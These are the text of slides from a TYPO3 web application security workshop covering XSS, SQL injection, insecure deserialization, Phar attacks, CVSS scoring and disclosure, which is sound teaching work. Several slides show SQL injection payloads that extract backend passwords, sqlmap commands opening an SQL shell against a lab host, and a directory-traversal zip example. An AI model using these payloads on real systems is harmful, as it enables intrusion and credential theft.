SlideShare una empresa de Scribd logo

Web Application Security Workshop (T3DD19)

Oliver Hader
Oliver Hader

Showing some (not all) basic vulnerabilities and mitigation strategies in TYPO3 and PHP (XSS, SQL injection, insecure deserialization, Phar stream), vulnerability reporting & CVSSv3, capture the flag...

Tecnología
1 de 91
Descargar para leer sin conexión
Web Application Security Workshop Oliver Hader oliver@typo3.org @ohader TYPO3 Developer Days 2019 August 4th, 2019
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 2 ▪Research & Development ▪Security Team Lead ▪50% TYPO3 GmbH ▪50% freelance software engineer ▪#hof #cycling #paramedic #in.die.musik ~# whoami Oliver Hader @ohader
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 3 ▪ session probably recorded ▪ real attack vectors are shown ▪ hackers probably knew already ▪ official security fixes available ▪ report to security@typo3.org Disclaimer
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Agenda 4 ▪ Attack technique basics (XSS, SQLi, deserialization) ▪ Attack tools/simulation (SQLmap, BeEF, BoNeSi) ▪ Phar Stream Vulnerability & Wrapper ▪ CVSSv3 vulnerability scoring ▪ TYPO3 Security Team ▪ Capture the Flag Agenda ⏳
What is your agenda? Do you have questions? 5TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Web Application Security Basics 6
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Web Application Security 7 ▪ CIA/compliance triad ▪ confidentiality ▪ private, personal, sensitive information ▪ integrity ▪ manipulation of information (“fake news”) ▪ availability ▪ denial of service ▪ online bank account ▪ blocking information flow https://www.ibm.com/blogs/cloud-computing/2018/01/16/drive-compliance-cloud/
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 8 Hacking Playground CONFIDENTIALITY - unauthorised access to information
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 9 Hacking Playground INTEGRITY - e.g. manipulated information
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 10 Hacking Playground AVAILABILITY - information/service not available
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 11 Web Application Security Open Web Application Security Project - TOP 10 vulnerabilities https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf TYPO3 core TYPO3 3rd party extensionsPHP world TYPO3vulnerabilitiesinpast5years
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 12 Web Application Security attack chains - multiple components might be affected https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Hacking Playground
 https://github.com/ ohader/typo3v9- hack/ 13TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Techniques, Mitigation, Tools 14
Cross-Site Scripting 15TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 16 Cross-Site Scripting - basics “classic” XSS
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 17 Cross-Site Scripting - basics XSS vectors - more at https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 18 Cross-Site Scripting - basics “classic” XSS mitigation ✔
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 19 Cross-Site Scripting - basics XSS with Fluid - f:format.html relies on TypoScript being available
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 20 Cross-Site Scripting - basics ViewHelper without any escaping == potentially vulnerable to XSS
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 21 http://typo3v9-hack.ddev.site:3000/ui/panel // admin & joh316
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 22 XSS exploitation
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 23 Browser Exploitation Framework in action
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 24 Browser Exploitation Framework in action
SQL injection 25TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 26 SQL injection basics “classic” SQL injection - query
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org SQL injection basics 27 ▪ SELECT … WHERE uid=10 AND pid>0; ▪ SELECT … WHERE uid=10 AND 1=1 -- AND pid>0; // bool true ▪ SELECT … WHERE uid=10 AND 1=0 -- AND pid>0; // bool false ▪ SELECT … WHERE uid=10 AND SLEEP(10) -- AND pid>0; // time ▪ comment literals (MySQL) ▪ -- ▪ # ▪ /* data */
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org SQL injection basics 28 ▪ SELECT … WHERE uid=10 AND pid>0; ▪ SELECT uid,pid,header WHERE uid=10 
 UNION SELECT username,password,3 
 FROM be_users WHERE SUBSTR(username, 1, 1) = ‘a’ 
 LIMIT 1,1 
 -- AND pid>0; ▪ … FROM be_users WHERE SUBSTR(username, 2, 1) = ‘d’ … ▪ … FROM be_users WHERE SUBSTR(username, 3, 1) = ‘m’ … ▪ … FROM be_users WHERE SUBSTR(username, 4, 1) = ‘i’ … ▪ … FROM be_users WHERE SUBSTR(username, 5, 1) = ’n’ …
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 29 SQL injection QueryBuilder WHERE SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = TEST;
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 30 SQL injection QueryBuilder WHERE SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = 0;
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 31 SQL injection QueryBuilder WHERE (prepared statement) SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = :dcValue1; ✔
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 32 SQL injection QueryBuilder WHERE … WHERE `header` LIKE ‘%a%_%b%';
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 33 SQL injection QueryBuilder WHERE … WHERE `header` LIKE ‘%a%_%b%’; ✔
SQLmap 34TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 35 http://typo3v9-hack.ddev.site/?eID=comments&search=term
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 36 ▪ ddev ssh -s sqlmap ▪ bash # suggested ▪ git checkout master ▪ git pull
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 37 ▪ ./sqlmap -u '<uri>' ––risk 3 ––level 3 ––banner ▪ regular call ▪ ./sqlmap -u 'http://typo3v9-hack.ddev.site/? eID=comments&search=typo3*' ––risk 3 ––level 3 ––banner ▪ inside ddev container ▪ ./sqlmap -u 'http://web/?eID=comments&search=typo3*' ––risk 3 ––level 3 ––sql-shell # marker* in GET parameters ▪ ./sqlmap -u 'http://web/?eID=comments' ––data '&search=typo3*' ––risk 3 ––level 3 ––sql-shell # marker* in POST
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 38 SQLmap
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 39 meanwhile in /var/log/nginx/access.log
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 40 possible SQL injection attack payload
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 41 remote SQL shell via SQL injection
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 42 “stacked queries” not allowed in PHP/PDO - SELECT …; INSERT …;
Insecure Deserialization 43TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 44 Insecure Deserialization - Basics __destruct() or __wakeup() methods are executed on deserialization
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 45 Insecure Deserialization - Basics user submitted payload to be deserialized
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 46 allowed_classes introduced with PHP 7.0 (Polyfill available)
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Insecure Deserialization - TYPO3-CORE-SA-2019-020 47 ▪ https://typo3.org/security/advisory/typo3-core-sa-2019-020/ ▪ https://blog.ripstech.com/2019/typo3-overriding-the-database/ ▪ overrideVals[<table>][l10n_diffsource]=<serialized payload> ▪ addressed on June 25th, 2019
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 48 Insecure Deserialization - Basics __destruct() saves content to filesystem
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 49 Remote Code Execution #1 making use of FileCookieJar as attack container
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 50 Remote Code Execution #1 prepare attack against TYPO3 backend
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 51 Remote Code Execution #1 actual attack payload that shall be executed
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 52 Remote Code Execution #1 XSRF token needs to be know (valid backend user required)
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 53 Remote Code Execution #1 output of injected & executed /typo3/hack.php
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 54 Remote Code Execution #1 … new admin user h4ck3r31 …
Other™ 55TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Other™ random topics 56 ▪ File Upload ▪ check/deny extensions (file deny pattern) ▪ check mime-types - image/png, text/html, … ▪ Extbase controller actions ▪ user/group access needs individual handling ▪ classic: logged in user can access profile data of others ▪ Directory Traversal ▪ zip bundle.zip ../malicious.php ▪ depends on how it is extracted
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org phar://… 57
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 58 https://packagist.org/packages/typo3/phar-stream-wrapper
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 59 ▪ usually used like
 require_once('phar://bundle.phar/vendor/autoload.php');
 $service = new BundleService(); ▪ Phar archives are vulnerable to insecure deserialisation ▪ all Phar archives in every PHP version (since 5.3) ▪ using “phar://“ stream wrapper is required here ▪ however, applies to regular file calls as well ▪ is_file(), file_exists(), fopen(), file_get_contents(), … ▪ is_file($_GET[‘fileName’]) // … user submitted data
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 60 demo web application
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 61 file does exist - correct
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 62 result of implicit insecure deserialization
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 63 Hybrid - Valid PNG file & Valid Phar archive
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 64 building hybrid Phar archive
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 65 PharStreamWrapper in TYPO3 core
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 66 ▪ TYPO3CMSCoreIOPharStreamWrapperInterceptor ▪ TYPO3 core - Phar only in typo3conf/ext/ directories ▪ TYPO3PharStreamWrapper…PharExtensionInterceptor ▪ Phar only with file extension “.phar” ▪ TYPO3PharStreamWrapper…PharMetaDataInterceptor ▪ Phar only without serialized objects in meta-data
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Vulnerability Reporting CVSSv3, Mitre & Co. 67
How to report? 68TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org How to report a security vulnerability? 69 ▪ always report via mail to security@typo3.org (Security Team) ▪ don’t post potential attacks to Forge, Twitter, … (public media) ▪ inform security team in case vulnerabilities are leaked ▪ please be patient & wait for feedback ▪ approx first response time is ~8 hours
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Responsible Disclosure Workflow 70 ▪ report vulnerability to vendor (here: security team) ▪ wait for feedback, questions or confirmation of this issue ▪ ask for status updates in case there is no activity ▪ declare deadline for full disclosure (e.g. 90 days) ▪ in case vendor does not take actions - public disclosure ▪ vendors (should) have interest to release security bulletins ▪ hiding vulnerability caused feeling of false security
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 71 Responsible Disclosure Workflow https://blog.ripstech.com/2019/typo3-overriding-the-database/
How to read reports? 72TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 73 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 74 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 75 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org CVSSv3 example #1 76 ▪ CVE-2013-1937 ▪ phpMyAdmin Reflected Cross-site Scripting Vulnerability ▪ “Reflected cross-site scripting (XSS) vulnerabilities are present on the tbl_gis_visualization.php page in phpMyAdmin 3.5.x, before version 3.5.8. These allow remote attackers to inject arbitrary JavaScript or HTML via the (1) visualizationSettings[width] or (2) visualizationSettings[height] parameters.”
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 77 CVSSv3 example #1 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org CVSSv3 example #2 78 ▪ CVE-2016-1645 ▪ Google Chrome PDFium JPEG 2000 Remote Code Execution Vulnerability ▪ “Allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the victim must visit a malicious page or open a malicious file. Flaw exists within the handling of JPEG 2000 images. Specially crafted JPEG 2000 image embedded inside a PDF can force Google Chrome to write memory past the end of an allocated object. Attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.”
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 79 CVSSv3 example #2 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 80 https://typo3.org/security/advisory/typo3-psa-2019-007/
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 81 https://typo3.org/security/advisory/typo3-psa-2019-007/
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 82 https://nvd.nist.gov/vuln/detail/CVE-2019-11831
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 83 https://nvd.nist.gov/vuln/detail/CVE-2019-11831
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org TYPO3 Security Team 84
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 85 ▪ triage and answer reports ▪ communicate with reporters (individuals, pen-testers) ▪ forward information to maintainers (core, extension author, …) ▪ frankly remind people in case activity is kind of low ▪ coordinate releases & release dates ▪ compile information into security bulletins / announcements ▪ educate & raise awareness in teams & community
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Capture the Flag 86
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 87 https://www.root-me.org/en/Challenges/Web-Server/
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 88 https://ctf.hacker101.com/ctf
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 89 ▪ https://www.root-me.org/en/Challenges/Web-Server/SQL- injection-Error # might work with SQLmap ▪ https://ctf.hacker101.com/ctf/launch/7 # check public API
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org References 90 ▪ Running an SQL Injection Attack: // “Computerphile“, nice series
 https://www.youtube.com/watch?v=ciNHn38EyRc ▪ WordPress WPDB SQL Injection: // nice, on “custom” escaping
 https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb- sql-injection-technical.html ▪ CVSSv3 Examples:
 https://www.first.org/cvss/v3.0/examples
thx! ;-) 91

Recomendados

Hacking TYPO3 v9
Hacking TYPO3 v9Hacking TYPO3 v9
Hacking TYPO3 v9Oliver Hader
 
Little Gems in TYPO3 v12
Little Gems in TYPO3 v12Little Gems in TYPO3 v12
Little Gems in TYPO3 v12Jigal van Hemert
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Understanding DLmalloc
Understanding DLmallocUnderstanding DLmalloc
Understanding DLmallocHaifeng Li
 
Notions de base de JavaScript
Notions de base de JavaScriptNotions de base de JavaScript
Notions de base de JavaScriptKristen Le Liboux
 
JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events WebStackAcademy
 

Recomendados

Hacking TYPO3 v9
Hacking TYPO3 v9Hacking TYPO3 v9
Hacking TYPO3 v9Oliver Hader
 
Little Gems in TYPO3 v12
Little Gems in TYPO3 v12Little Gems in TYPO3 v12
Little Gems in TYPO3 v12Jigal van Hemert
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Understanding DLmalloc
Understanding DLmallocUnderstanding DLmalloc
Understanding DLmallocHaifeng Li
 
Notions de base de JavaScript
Notions de base de JavaScriptNotions de base de JavaScript
Notions de base de JavaScriptKristen Le Liboux
 
JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events JavaScript - Chapter 11 - Events
JavaScript - Chapter 11 - Events WebStackAcademy
 
GNU awk (gawk) を用いた Apache ログ解析方法
GNU awk (gawk) を用いた Apache ログ解析方法GNU awk (gawk) を用いた Apache ログ解析方法
GNU awk (gawk) を用いた Apache ログ解析方法博文 斉藤
 
[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화NAVER D2
 
Deploying PHP applications with Phing
Deploying PHP applications with PhingDeploying PHP applications with Phing
Deploying PHP applications with PhingMichiel Rook
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
Javascript Basic
Javascript BasicJavascript Basic
Javascript BasicKang-min Liu
 
PostgreSQL on EXT4, XFS, BTRFS and ZFS
PostgreSQL on EXT4, XFS, BTRFS and ZFSPostgreSQL on EXT4, XFS, BTRFS and ZFS
PostgreSQL on EXT4, XFS, BTRFS and ZFSTomas Vondra
 
MongoDB Performance Tuning
MongoDB Performance TuningMongoDB Performance Tuning
MongoDB Performance TuningPuneet Behl
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
JavaScript: Events Handling
JavaScript: Events HandlingJavaScript: Events Handling
JavaScript: Events HandlingYuriy Bezgachnyuk
 
Mongo DB 성능최적화 전략
Mongo DB 성능최적화 전략Mongo DB 성능최적화 전략
Mongo DB 성능최적화 전략Jin wook
 
Node.js in 2020 - part 3
Node.js in 2020 - part 3Node.js in 2020 - part 3
Node.js in 2020 - part 3Timur Shemsedinov
 
What’s New in Angular 14?
What’s New in Angular 14?What’s New in Angular 14?
What’s New in Angular 14?Albiorix Technology
 
Spring I/O 2012: Natural Templating in Spring MVC with Thymeleaf
Spring I/O 2012: Natural Templating in Spring MVC with ThymeleafSpring I/O 2012: Natural Templating in Spring MVC with Thymeleaf
Spring I/O 2012: Natural Templating in Spring MVC with ThymeleafThymeleaf
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Cloudflare
 
AngularJS Directives
AngularJS DirectivesAngularJS Directives
AngularJS DirectivesEyal Vardi
 
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)LanarkSeung
 
Angular Directives
Angular DirectivesAngular Directives
Angular DirectivesMalla Reddy University
 
Pythonおじさんのweb2py挑戦記
Pythonおじさんのweb2py挑戦記Pythonおじさんのweb2py挑戦記
Pythonおじさんのweb2py挑戦記Yoshiyuki Nakamura
 
Nuxt.JS Introdruction
Nuxt.JS IntrodructionNuxt.JS Introdruction
Nuxt.JS IntrodructionDavid Ličen
 
Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Oliver Hader
 
T3DD23 Content Security Policy - Concept, Strategies & Pitfalls
T3DD23 Content Security Policy - Concept, Strategies & PitfallsT3DD23 Content Security Policy - Concept, Strategies & Pitfalls
T3DD23 Content Security Policy - Concept, Strategies & PitfallsOliver Hader
 

Más contenido relacionado

La actualidad más candente

GNU awk (gawk) を用いた Apache ログ解析方法
GNU awk (gawk) を用いた Apache ログ解析方法GNU awk (gawk) を用いた Apache ログ解析方法
GNU awk (gawk) を用いた Apache ログ解析方法博文 斉藤
 
[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화NAVER D2
 
Deploying PHP applications with Phing
Deploying PHP applications with PhingDeploying PHP applications with Phing
Deploying PHP applications with PhingMichiel Rook
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
PostgreSQL on EXT4, XFS, BTRFS and ZFS
PostgreSQL on EXT4, XFS, BTRFS and ZFSPostgreSQL on EXT4, XFS, BTRFS and ZFS
PostgreSQL on EXT4, XFS, BTRFS and ZFSTomas Vondra
 
MongoDB Performance Tuning
MongoDB Performance TuningMongoDB Performance Tuning
MongoDB Performance TuningPuneet Behl
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
Mongo DB 성능최적화 전략
Mongo DB 성능최적화 전략Mongo DB 성능최적화 전략
Mongo DB 성능최적화 전략Jin wook
 
Spring I/O 2012: Natural Templating in Spring MVC with Thymeleaf
Spring I/O 2012: Natural Templating in Spring MVC with ThymeleafSpring I/O 2012: Natural Templating in Spring MVC with Thymeleaf
Spring I/O 2012: Natural Templating in Spring MVC with ThymeleafThymeleaf
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Cloudflare
 
AngularJS Directives
AngularJS DirectivesAngularJS Directives
AngularJS DirectivesEyal Vardi
 
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)LanarkSeung
 
Pythonおじさんのweb2py挑戦記
Pythonおじさんのweb2py挑戦記Pythonおじさんのweb2py挑戦記
Pythonおじさんのweb2py挑戦記Yoshiyuki Nakamura
 
Nuxt.JS Introdruction
Nuxt.JS IntrodructionNuxt.JS Introdruction
Nuxt.JS IntrodructionDavid Ličen
 

La actualidad más candente (20)

GNU awk (gawk) を用いた Apache ログ解析方法
GNU awk (gawk) を用いた Apache ログ解析方法GNU awk (gawk) を用いた Apache ログ解析方法
GNU awk (gawk) を用いた Apache ログ解析方法
 
[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화
 
Deploying PHP applications with Phing
Deploying PHP applications with PhingDeploying PHP applications with Phing
Deploying PHP applications with Phing
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
 
Javascript Basic
Javascript BasicJavascript Basic
Javascript Basic
 
PostgreSQL on EXT4, XFS, BTRFS and ZFS
PostgreSQL on EXT4, XFS, BTRFS and ZFSPostgreSQL on EXT4, XFS, BTRFS and ZFS
PostgreSQL on EXT4, XFS, BTRFS and ZFS
 
MongoDB Performance Tuning
MongoDB Performance TuningMongoDB Performance Tuning
MongoDB Performance Tuning
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
JavaScript: Events Handling
JavaScript: Events HandlingJavaScript: Events Handling
JavaScript: Events Handling
 
Mongo DB 성능최적화 전략
Mongo DB 성능최적화 전략Mongo DB 성능최적화 전략
Mongo DB 성능최적화 전략
 
Node.js in 2020 - part 3
Node.js in 2020 - part 3Node.js in 2020 - part 3
Node.js in 2020 - part 3
 
What’s New in Angular 14?
What’s New in Angular 14?What’s New in Angular 14?
What’s New in Angular 14?
 
Spring I/O 2012: Natural Templating in Spring MVC with Thymeleaf
Spring I/O 2012: Natural Templating in Spring MVC with ThymeleafSpring I/O 2012: Natural Templating in Spring MVC with Thymeleaf
Spring I/O 2012: Natural Templating in Spring MVC with Thymeleaf
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming
 
AngularJS Directives
AngularJS DirectivesAngularJS Directives
AngularJS Directives
 
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)
Create-React-App으로 SSR을 구현하며 배운 점 (feat. TypeScript)
 
Angular Directives
Angular DirectivesAngular Directives
Angular Directives
 
Pythonおじさんのweb2py挑戦記
Pythonおじさんのweb2py挑戦記Pythonおじさんのweb2py挑戦記
Pythonおじさんのweb2py挑戦記
 
Nuxt.JS Introdruction
Nuxt.JS IntrodructionNuxt.JS Introdruction
Nuxt.JS Introdruction
 

Similar a Web Application Security Workshop (T3DD19)

Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Oliver Hader
 
T3DD23 Content Security Policy - Concept, Strategies & Pitfalls
T3DD23 Content Security Policy - Concept, Strategies & PitfallsT3DD23 Content Security Policy - Concept, Strategies & Pitfalls
